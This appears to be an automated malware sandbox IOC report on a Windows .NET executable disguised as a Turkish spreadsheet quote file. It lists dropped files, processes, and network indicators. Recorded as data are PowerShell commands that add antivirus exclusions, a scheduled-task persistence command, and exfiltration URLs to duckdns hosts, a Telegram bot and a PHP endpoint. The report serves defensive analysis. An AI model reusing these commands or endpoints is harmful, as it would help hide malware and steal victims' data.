IOC Report
TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

loading gif

Files

File Path
Type
Category
Malicious
TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.log
ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\tmp1B98.tmp
XML 1.0 document, ASCII text
dropped
malicious
C:\Users\user\AppData\Roaming\OnCgVRIhY.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\OnCgVRIhY.exe:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\OnCgVRIhY.exe.log
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aju0ovhc.hm4.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bleeyba5.jwl.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cubm45qi.tff.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cyybqu4b.t2p.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i2b05ib0.lfi.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_njybn5xo.zbl.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tyfheknh.0ir.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u3e5u04e.xci.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\tmp2CAF.tmp
XML 1.0 document, ASCII text
dropped
There are 6 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
"C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OnCgVRIhY.exe"
malicious
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OnCgVRIhY" /XML "C:\Users\user\AppData\Local\Temp\tmp1B98.tmp"
malicious
C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
"C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe"
malicious
C:\Users\user\AppData\Roaming\OnCgVRIhY.exe
C:\Users\user\AppData\Roaming\OnCgVRIhY.exe
malicious
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OnCgVRIhY" /XML "C:\Users\user\AppData\Local\Temp\tmp2CAF.tmp"
malicious
C:\Users\user\AppData\Roaming\OnCgVRIhY.exe
"C:\Users\user\AppData\Roaming\OnCgVRIhY.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 3 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://aborters.duckdns.org:8081
unknown
malicious
http://anotherarmy.dns.army:8081
unknown
malicious
https://www.office.com/
unknown
https://duckduckgo.com/chrome_newtab
unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216865%0D%0ADate%20a
unknown
https://duckduckgo.com/ac/?q=
unknown
https://api.telegram.org
unknown
https://chrome.google.com/webstore?hl=enlBcq
unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico
unknown
https://api.telegram.org/bot
unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216865%0D%0ADate%20and%20Time:%2027/09/2024%20/%2004:36:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216865%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D
149.154.167.220
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216865%0D%0ADate%20and%20Time:%2026/09/2024%20/%2022:26:13%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216865%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D
149.154.167.220
http://checkip.dyndns.org
unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
unknown
https://reallyfreegeoip.org/xml/8.46.123.33
188.114.96.3
https://api.telegram.org/bot/sendMessage?chat_id=&text=
unknown
https://chrome.google.com/webstore?hl=en
unknown
https://www.ecosia.org/newtab/
unknown
https://chrome.google.com/webstore?hl=enx
unknown
http://varders.kozow.com:8081
unknown
https://ac.ecosia.org/autocomplete?q=
unknown
https://www.office.com/x
unknown
http://checkip.dyndns.org/
132.226.8.169
https://reallyfreegeoip.org/xml/8.46.123.33$
unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
unknown
http://checkip.dyndns.org/q
unknown
https://reallyfreegeoip.org
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
unknown
https://www.office.com/lBcq
unknown
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
unknown
https://reallyfreegeoip.org/xml/
unknown
There are 23 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
reallyfreegeoip.org
188.114.96.3
malicious
api.telegram.org
149.154.167.220
malicious
checkip.dyndns.org
unknown
malicious
checkip.dyndns.com
132.226.8.169

IPs

IP
Domain
Country
Malicious
149.154.167.220
api.telegram.org
United Kingdom
malicious
188.114.96.3
reallyfreegeoip.org
European Union
malicious
132.226.8.169
checkip.dyndns.com
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx_RASMANCS
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\OnCgVRIhY_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\OnCgVRIhY_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\OnCgVRIhY_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\OnCgVRIhY_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\OnCgVRIhY_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\OnCgVRIhY_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\OnCgVRIhY_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\OnCgVRIhY_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\OnCgVRIhY_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\OnCgVRIhY_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\OnCgVRIhY_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\OnCgVRIhY_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\OnCgVRIhY_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\OnCgVRIhY_RASMANCS
FileDirectory
There are 19 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
39C9000
trusted library allocation
page read and write
malicious
432000
remote allocation
page execute and read and write
malicious
435000
remote allocation
page execute and read and write
malicious
3041000
trusted library allocation
page read and write
malicious
434000
remote allocation
page execute and read and write
malicious
2F61000
trusted library allocation
page read and write
malicious
334A000
trusted library allocation
page read and write
6EBE000
stack
page read and write
4F60000
trusted library allocation
page read and write
E30000
heap
page read and write
30E2000
trusted library allocation
page read and write
74F0000
trusted library allocation
page read and write
3118000
trusted library allocation
page read and write
12D5000
trusted library allocation
page execute and read and write
E4F000
stack
page read and write
6C00000
trusted library allocation
page read and write
42E000
remote allocation
page execute and read and write
1079000
stack
page read and write
6F40000
heap
page read and write
3102000
trusted library allocation
page read and write
5B2E000
stack
page read and write
1337000
heap
page read and write
C88000
heap
page read and write
3020000
trusted library allocation
page read and write
12C6000
trusted library allocation
page execute and read and write
6BE6000
trusted library allocation
page read and write
40C5000
trusted library allocation
page read and write
12F4000
trusted library allocation
page read and write
4187000
trusted library allocation
page read and write
164C000
stack
page read and write
5570000
trusted library allocation
page execute and read and write
4F60000
trusted library allocation
page read and write
2CD1000
trusted library allocation
page read and write
31AF000
trusted library allocation
page read and write
5205000
trusted library allocation
page read and write
12B0000
trusted library allocation
page read and write
30EA000
trusted library allocation
page read and write
4E90000
trusted library allocation
page read and write
3F6F000
trusted library allocation
page read and write
68C9000
heap
page read and write
4041000
trusted library allocation
page read and write
721F000
stack
page read and write
5592000
trusted library allocation
page read and write
6F00000
trusted library section
page read and write
314B000
trusted library allocation
page read and write
42A000
remote allocation
page execute and read and write
40D3000
trusted library allocation
page read and write
40D9000
trusted library allocation
page read and write
43E2000
trusted library allocation
page read and write
32FE000
trusted library allocation
page read and write
4E6C000
stack
page read and write
2F06000
trusted library allocation
page read and write
4FB0000
heap
page read and write
3342000
trusted library allocation
page read and write
55A1000
trusted library allocation
page read and write
55F0000
trusted library allocation
page read and write
F00000
heap
page read and write
326F000
trusted library allocation
page read and write
318E000
trusted library allocation
page read and write
55A0000
heap
page execute and read and write
422B000
trusted library allocation
page read and write
F84000
trusted library allocation
page read and write
2EEA000
stack
page read and write
51B0000
trusted library allocation
page read and write
72FE000
heap
page read and write
31B6000
trusted library allocation
page read and write
3008000
trusted library allocation
page read and write
12AD000
trusted library allocation
page execute and read and write
FA6000
trusted library allocation
page execute and read and write
429000
remote allocation
page execute and read and write
3FEF000
trusted library allocation
page read and write
A37D000
stack
page read and write
31B1000
trusted library allocation
page read and write
12F0000
trusted library allocation
page read and write
43F8000
trusted library allocation
page read and write
32B5000
trusted library allocation
page read and write
1080000
heap
page read and write
2F33000
heap
page read and write
C58000
heap
page read and write
326D000
trusted library allocation
page read and write
2EEE000
trusted library allocation
page read and write
39C1000
trusted library allocation
page read and write
12C0000
trusted library allocation
page read and write
CC9000
stack
page read and write
F83000
trusted library allocation
page execute and read and write
A9A000
stack
page read and write
4399000
trusted library allocation
page read and write
3304000
trusted library allocation
page read and write
27D8000
trusted library allocation
page read and write
12F6000
trusted library allocation
page execute and read and write
3024000
trusted library allocation
page read and write
1322000
trusted library allocation
page read and write
4435000
trusted library allocation
page read and write
6D50000
trusted library allocation
page execute and read and write
1325000
trusted library allocation
page execute and read and write
2FB2000
trusted library allocation
page read and write
2760000
trusted library allocation
page read and write
3FD3000
trusted library allocation
page read and write
6C10000
trusted library allocation
page execute and read and write
A71C000
stack
page read and write
3C56000
trusted library allocation
page read and write
13A6000
heap
page read and write
3004000
trusted library allocation
page read and write
6F00000
trusted library allocation
page execute and read and write
4288000
trusted library allocation
page read and write
32C0000
trusted library allocation
page read and write
6BE0000
trusted library allocation
page read and write
5595000
heap
page read and write
12DD000
trusted library allocation
page execute and read and write
4EE0000
trusted library allocation
page read and write
4F42000
trusted library allocation
page read and write
41A3000
trusted library allocation
page read and write
32BB000
trusted library allocation
page read and write
1670000
trusted library allocation
page execute and read and write
54D0000
trusted library allocation
page read and write
12CE000
stack
page read and write
7F800000
trusted library allocation
page execute and read and write
1460000
heap
page read and write
4370000
trusted library allocation
page read and write
FAA000
trusted library allocation
page execute and read and write
6950000
heap
page read and write
42FA000
trusted library allocation
page read and write
4F20000
heap
page read and write
2D27000
trusted library allocation
page read and write
29B0000
heap
page execute and read and write
6DF0000
trusted library allocation
page execute and read and write
4386000
trusted library allocation
page read and write
2990000
heap
page read and write
30FA000
trusted library allocation
page read and write
5B90000
trusted library allocation
page execute and read and write
12CA000
trusted library allocation
page execute and read and write
A210000
heap
page read and write
51D6000
trusted library allocation
page read and write
49FB000
stack
page read and write
2EC0000
heap
page read and write
5310000
heap
page read and write
3FE4000
trusted library allocation
page read and write
6C30000
trusted library allocation
page execute and read and write
56AD000
stack
page read and write
15BE000
stack
page read and write
3710000
heap
page read and write
5330000
heap
page read and write
6DE0000
trusted library allocation
page execute and read and write
4F68000
trusted library allocation
page read and write
2F20000
trusted library allocation
page read and write
2AF0000
heap
page read and write
10A0000
heap
page read and write
A61B000
stack
page read and write
4316000
trusted library allocation
page read and write
4EA0000
trusted library allocation
page read and write
51D1000
trusted library allocation
page read and write
79FF000
stack
page read and write
12A4000
trusted library allocation
page read and write
3014000
trusted library allocation
page read and write
51CE000
trusted library allocation
page read and write
298E000
stack
page read and write
52F0000
trusted library allocation
page read and write
5270000
heap
page read and write
423E000
trusted library allocation
page read and write
519B000
stack
page read and write
4F90000
heap
page read and write
4277000
trusted library allocation
page read and write
115D000
heap
page read and write
4216000
trusted library allocation
page read and write
4323000
trusted library allocation
page read and write
A7B3000
heap
page read and write
6D20000
trusted library allocation
page read and write
2FB4000
trusted library allocation
page read and write
3223000
trusted library allocation
page read and write
1280000
trusted library allocation
page read and write
402000
remote allocation
page execute and read and write
2F30000
heap
page read and write
6C0E000
stack
page read and write
436B000
trusted library allocation
page read and write
41B9000
trusted library allocation
page read and write
11E0000
heap
page read and write
6BDE000
stack
page read and write
4EB0000
trusted library allocation
page read and write
51DD000
trusted library allocation
page read and write
3273000
trusted library allocation
page read and write
12FA000
trusted library allocation
page execute and read and write
1320000
trusted library allocation
page read and write
11B5000
heap
page read and write
3254000
trusted library allocation
page read and write
9F3D000
stack
page read and write
558E000
trusted library allocation
page read and write
6D10000
trusted library allocation
page execute and read and write
EC0000
heap
page read and write
12C0000
trusted library allocation
page read and write
32ED000
trusted library allocation
page read and write
2A6E000
trusted library allocation
page read and write
4E50000
trusted library allocation
page read and write
12D7000
trusted library allocation
page execute and read and write
41BC000
trusted library allocation
page read and write
3120000
trusted library allocation
page read and write
31E4000
trusted library allocation
page read and write
4E7D000
trusted library allocation
page read and write
5333000
heap
page read and write
A7C4000
heap
page read and write
52ED000
stack
page read and write
E10000
heap
page read and write
2880000
heap
page read and write
32BE000
trusted library allocation
page read and write
2FD7000
trusted library allocation
page read and write
7300000
heap
page read and write
4301000
trusted library allocation
page read and write
3F61000
trusted library allocation
page read and write
1310000
trusted library allocation
page read and write
78EE000
stack
page read and write
14EC000
stack
page read and write
2AFB000
heap
page read and write
3345000
trusted library allocation
page read and write
2BC0000
heap
page read and write
42EF000
trusted library allocation
page read and write
6EE7000
trusted library allocation
page read and write
E7E000
stack
page read and write
12D0000
trusted library allocation
page read and write
4EB5000
trusted library allocation
page read and write
42E8000
trusted library allocation
page read and write
726F000
stack
page read and write
12BD000
trusted library allocation
page execute and read and write
52A0000
trusted library allocation
page execute and read and write
350A000
heap
page read and write
2ACC000
trusted library allocation
page read and write
3F67000
trusted library allocation
page read and write
4329000
trusted library allocation
page read and write
C91000
heap
page read and write
51E0000
trusted library allocation
page read and write
2EEB000
trusted library allocation
page read and write
4AFC000
stack
page read and write
3147000
trusted library allocation
page read and write
29C1000
trusted library allocation
page read and write
2DCF000
stack
page read and write
1680000
heap
page read and write
7590000
trusted library allocation
page execute and read and write
6EC0000
trusted library allocation
page execute and read and write
6EF0000
trusted library allocation
page read and write
4E80000
trusted library allocation
page read and write
4439000
trusted library allocation
page read and write
12C2000
trusted library allocation
page read and write
C6F000
heap
page read and write
40B000
remote allocation
page execute and read and write
10D6000
heap
page read and write
2BF0000
heap
page read and write
440B000
trusted library allocation
page read and write
15C0000
trusted library allocation
page read and write
1330000
heap
page read and write
3F81000
trusted library allocation
page read and write
EE7000
heap
page read and write
40A000
remote allocation
page execute and read and write
757E000
stack
page read and write
2B90000
trusted library allocation
page execute and read and write
1520000
heap
page read and write
12F2000
trusted library allocation
page read and write
40CB000
trusted library allocation
page read and write
56C0000
heap
page read and write
42C000
remote allocation
page execute and read and write
51E2000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
C4E000
stack
page read and write
6C4E000
stack
page read and write
137E000
stack
page read and write
5200000
trusted library allocation
page read and write
54CE000
stack
page read and write
77AE000
stack
page read and write
5560000
heap
page read and write
A68E000
stack
page read and write
131A000
heap
page read and write
430B000
trusted library allocation
page read and write
2FE0000
heap
page read and write
54BD000
stack
page read and write
2F30000
heap
page read and write
1230000
heap
page read and write
2E38000
trusted library allocation
page read and write
5210000
trusted library allocation
page read and write
3125000
trusted library allocation
page read and write
30BD000
trusted library allocation
page read and write
2FCC000
trusted library allocation
page read and write
31B9000
trusted library allocation
page read and write
4CD8000
trusted library allocation
page read and write
2A17000
trusted library allocation
page read and write
3350000
trusted library allocation
page read and write
711E000
stack
page read and write
31B3000
trusted library allocation
page read and write
12F3000
trusted library allocation
page execute and read and write
F70000
trusted library allocation
page read and write
1030000
heap
page read and write
5B80000
trusted library allocation
page read and write
1316000
trusted library allocation
page execute and read and write
4183000
trusted library allocation
page read and write
4F50000
trusted library allocation
page execute and read and write
2EE6000
trusted library allocation
page read and write
30B8000
trusted library allocation
page read and write
3261000
trusted library allocation
page read and write
2F0E000
stack
page read and write
5320000
heap
page read and write
A04E000
stack
page read and write
3F74000
trusted library allocation
page read and write
6DCE000
stack
page read and write
77EE000
stack
page read and write
699E000
stack
page read and write
42D000
remote allocation
page execute and read and write
6860000
heap
page read and write
2ECE000
stack
page read and write
12A0000
trusted library allocation
page read and write
4F30000
heap
page read and write
2E30000
trusted library allocation
page read and write
348C000
trusted library allocation
page read and write
A00E000
stack
page read and write
306C000
trusted library allocation
page read and write
3FDA000
trusted library allocation
page read and write
40AD000
trusted library allocation
page read and write
51F0000
trusted library allocation
page read and write
4451000
trusted library allocation
page read and write
A252000
heap
page read and write
1307000
trusted library allocation
page execute and read and write
5340000
heap
page read and write
72D8000
heap
page read and write
2762000
trusted library allocation
page read and write
56C0000
heap
page execute and read and write
7230000
heap
page read and write
130D000
trusted library allocation
page execute and read and write
59D0000
trusted library allocation
page read and write
4075000
trusted library allocation
page read and write
FA2000
trusted library allocation
page read and write
69AE000
heap
page read and write
3156000
trusted library allocation
page read and write
A140000
heap
page read and write
2870000
trusted library allocation
page execute and read and write
31AB000
trusted library allocation
page read and write
4FC0000
heap
page read and write
6C10000
trusted library allocation
page execute and read and write
2F50000
heap
page execute and read and write
412E000
trusted library allocation
page read and write
3010000
trusted library allocation
page read and write
437000
remote allocation
page execute and read and write
41F000
remote allocation
page execute and read and write
3267000
trusted library allocation
page read and write
A20D000
stack
page read and write
51D0000
trusted library section
page read and write
2F0D000
trusted library allocation
page read and write
3348000
trusted library allocation
page read and write
73EE000
stack
page read and write
12D2000
trusted library allocation
page read and write
3046000
trusted library allocation
page read and write
2F10000
heap
page execute and read and write
40D1000
trusted library allocation
page read and write
12F8000
heap
page read and write
6CC0000
trusted library allocation
page read and write
566D000
stack
page read and write
32F8000
trusted library allocation
page read and write
3354000
trusted library allocation
page read and write
31D6000
trusted library allocation
page read and write
40D000
remote allocation
page execute and read and write
AA1C000
stack
page read and write
A47E000
stack
page read and write
32F2000
trusted library allocation
page read and write
74F0000
heap
page read and write
A85E000
stack
page read and write
559E000
trusted library allocation
page read and write
12F0000
trusted library allocation
page read and write
F93000
trusted library allocation
page read and write
12E0000
trusted library allocation
page read and write
321D000
trusted library allocation
page read and write
9F9D000
stack
page read and write
72BD000
heap
page read and write
1450000
trusted library allocation
page read and write
4134000
trusted library allocation
page read and write
1177000
stack
page read and write
418A000
trusted library allocation
page read and write
2FDB000
trusted library allocation
page read and write
32FA000
trusted library allocation
page read and write
3C13000
trusted library allocation
page read and write
A91B000
stack
page read and write
55D0000
trusted library allocation
page read and write
1128000
heap
page read and write
3F03000
trusted library allocation
page read and write
433000
remote allocation
page execute and read and write
6C0B000
trusted library allocation
page read and write
6862000
heap
page read and write
3E31000
trusted library allocation
page read and write
2D8E000
stack
page read and write
7192000
trusted library allocation
page read and write
4395000
trusted library allocation
page read and write
3CD9000
trusted library allocation
page read and write
2B70000
heap
page read and write
66DE000
stack
page read and write
51E0000
heap
page execute and read and write
12DB000
trusted library allocation
page execute and read and write
F90000
trusted library allocation
page read and write
2A3D000
stack
page read and write
7A0000
heap
page read and write
30F2000
trusted library allocation
page read and write
7A6000
heap
page read and write
3196000
trusted library allocation
page read and write
2780000
trusted library allocation
page read and write
5292000
trusted library allocation
page read and write
5230000
trusted library allocation
page read and write
12D0000
trusted library allocation
page read and write
6E10000
trusted library allocation
page execute and read and write
55C0000
trusted library allocation
page read and write
2A79000
stack
page read and write
2F01000
trusted library allocation
page read and write
40D7000
trusted library allocation
page read and write
4262000
trusted library allocation
page read and write
31BE000
trusted library allocation
page read and write
CC0000
heap
page read and write
6ACE000
stack
page read and write
669E000
stack
page read and write
318A000
trusted library allocation
page read and write
33AB000
trusted library allocation
page read and write
6C40000
trusted library allocation
page execute and read and write
42C2000
trusted library allocation
page read and write
1326000
heap
page read and write
1300000
trusted library allocation
page read and write
4062000
trusted library allocation
page read and write
334E000
trusted library allocation
page read and write
59E4000
trusted library allocation
page read and write
6A9E000
stack
page read and write
70DE000
stack
page read and write
55C4000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
C5E000
heap
page read and write
3335000
trusted library allocation
page read and write
6D37000
trusted library allocation
page read and write
57B0000
heap
page read and write
559A000
trusted library allocation
page read and write
5290000
trusted library allocation
page read and write
403000
remote allocation
page execute and read and write
3295000
trusted library allocation
page read and write
2F9E000
unkown
page read and write
2EE0000
trusted library allocation
page read and write
3264000
trusted library allocation
page read and write
2F50000
heap
page read and write
320D000
trusted library allocation
page read and write
7D0000
heap
page read and write
13E4000
heap
page read and write
3D69000
trusted library allocation
page read and write
2AE0000
heap
page read and write
4312000
trusted library allocation
page read and write
6D90000
heap
page read and write
612000
unkown
page readonly
31E1000
trusted library allocation
page read and write
4F23000
heap
page read and write
162E000
stack
page read and write
1300000
trusted library allocation
page read and write
6A90000
heap
page read and write
799E000
stack
page read and write
3112000
trusted library allocation
page read and write
CF1000
heap
page read and write
32C9000
trusted library allocation
page read and write
1650000
heap
page read and write
57CA000
trusted library allocation
page read and write
429D000
trusted library allocation
page read and write
2EFE000
trusted library allocation
page read and write
51FF000
trusted library allocation
page read and write
6E70000
trusted library allocation
page read and write
2BB6000
trusted library allocation
page read and write
2FCF000
trusted library allocation
page read and write
4E54000
trusted library allocation
page read and write
74A000
stack
page read and write
D45000
heap
page read and write
4326000
trusted library allocation
page read and write
2B1E000
stack
page read and write
4EC0000
trusted library allocation
page read and write
FC0000
heap
page read and write
30EE000
trusted library allocation
page read and write
FB7000
heap
page read and write
57D0000
trusted library allocation
page read and write
3F88000
trusted library allocation
page read and write
14AE000
stack
page read and write
557E000
stack
page read and write
4358000
trusted library allocation
page read and write
6B0E000
stack
page read and write
439000
remote allocation
page execute and read and write
EEB000
heap
page read and write
415C000
trusted library allocation
page read and write
CB5000
heap
page read and write
3F89000
trusted library allocation
page read and write
F7E000
heap
page read and write
A33E000
stack
page read and write
7580000
trusted library allocation
page read and write
132B000
trusted library allocation
page execute and read and write
7530000
trusted library allocation
page read and write
31E5000
trusted library allocation
page read and write
A7A6000
heap
page read and write
414A000
trusted library allocation
page read and write
74EE000
stack
page read and write
E60000
heap
page read and write
1246000
heap
page read and write
51FD000
trusted library allocation
page read and write
11B0000
heap
page read and write
12D4000
trusted library allocation
page read and write
5590000
heap
page read and write
FB0000
heap
page read and write
421A000
trusted library allocation
page read and write
12A3000
trusted library allocation
page execute and read and write
3018000
trusted library allocation
page read and write
57E0000
heap
page execute and read and write
43E7000
trusted library allocation
page read and write
3092000
trusted library allocation
page read and write
EDF000
heap
page read and write
3F23000
trusted library allocation
page read and write
2F20000
trusted library allocation
page read and write
2D8A000
trusted library allocation
page read and write
5586000
trusted library allocation
page read and write
31EA000
trusted library allocation
page read and write
51BB000
trusted library allocation
page read and write
1240000
heap
page read and write
3129000
trusted library allocation
page read and write
610000
unkown
page readonly
30FE000
trusted library allocation
page read and write
EBE000
stack
page read and write
6F9E000
stack
page read and write
31E2000
trusted library allocation
page read and write
51B4000
trusted library allocation
page read and write
3E7E000
trusted library allocation
page read and write
300C000
trusted library allocation
page read and write
6ED3000
trusted library allocation
page read and write
2DDA000
trusted library allocation
page read and write
A99E000
stack
page read and write
314B000
trusted library allocation
page read and write
12ED000
trusted library allocation
page execute and read and write
5580000
trusted library allocation
page read and write
7A9E000
stack
page read and write
A40E000
stack
page read and write
F6E000
stack
page read and write
306E000
trusted library allocation
page read and write
2EFA000
trusted library allocation
page read and write
2BA0000
trusted library allocation
page read and write
12E0000
trusted library allocation
page read and write
4E5B000
trusted library allocation
page read and write
6BFE000
stack
page read and write
107E000
stack
page read and write
30B4000
trusted library allocation
